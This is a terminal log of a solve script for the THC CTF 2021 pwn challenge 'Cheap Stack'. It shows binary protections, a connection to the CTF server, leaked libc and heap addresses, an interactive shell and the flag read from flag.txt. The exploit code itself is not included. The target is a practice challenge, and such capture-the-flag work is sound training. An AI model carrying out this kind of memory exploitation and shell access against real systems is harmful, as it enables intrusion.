mito@ubuntu:~/CTF/THC_CTF_2021/Pwn_Cheap_Stack_500$ python solve.py r
[*] '/home/mito/CTF/THC_CTF_2021/Pwn_Cheap_Stack_500/cheap_stack'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to remote2.thcon.party on port 10903: Done
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
libc_leak = 0x7f48a01150a0
libc_base = 0x7f489fd29000
heap_leak = 0x56543aded850
heap_base = 0x56543aded000
[*] Switching to interactive mode
Popped value: /bin/sh
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ ls -l
total 140
-rwxr-xr-x 1 root root  17344 Jun  8 20:15 cheap_stack
-rw------- 1 user user 380928 Jun 12 22:52 core
-rw-r--r-- 1 root root     44 Jun  8 20:15 flag.txt
$ cat flag.txt
THCon21{15_7h15_4_5t4cK_Buff3r_0v3rfl0w???}
